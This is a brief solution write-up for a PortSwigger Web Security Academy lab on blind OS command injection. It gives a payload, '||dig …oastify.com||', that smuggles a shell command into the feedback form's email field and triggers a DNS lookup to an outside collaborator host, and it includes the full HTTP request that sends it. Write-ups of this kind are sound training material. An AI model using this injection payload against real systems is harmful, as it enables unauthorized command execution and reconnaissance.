Port Swigger Blind OS command injection with out o

Blind OS command injection with out-of-band interaction

Solution

Open the website: https://0a2e003a04620bc68076266600040064.web-security-academy.net/feedback

https://0a2e003a04620bc68076266600040064.web-security-academy.net/feedback

Copy to clipboard Collaborator address

9isw0gtb66beax22lduciuv3eukl8c00p.oastify.com

Create payload

Payload: ||dig%209isw0gtb66beax22lduciuv3eukl8c00p.oastify.com||
---
POST /feedback/submit HTTP/2
Host: 0a2c00a104832c5282c147250029002d.web-security-academy.net
Cookie: session=9HVzQ0V6jNiINafozDQn6UL4opfzwZRS
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Origin: https://0a2c00a104832c5282c147250029002d.web-security-academy.net
Referer: https://0a2c00a104832c5282c147250029002d.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=CO6xwdcjqIdf16hKUHCmrshAwAY3dcAk&name=Jan&email=test%40wp.pl||dig%209isw0gtb66beax22lduciuv3eukl8c00p.oastify.com||&subject=Temat&message=aass

Solved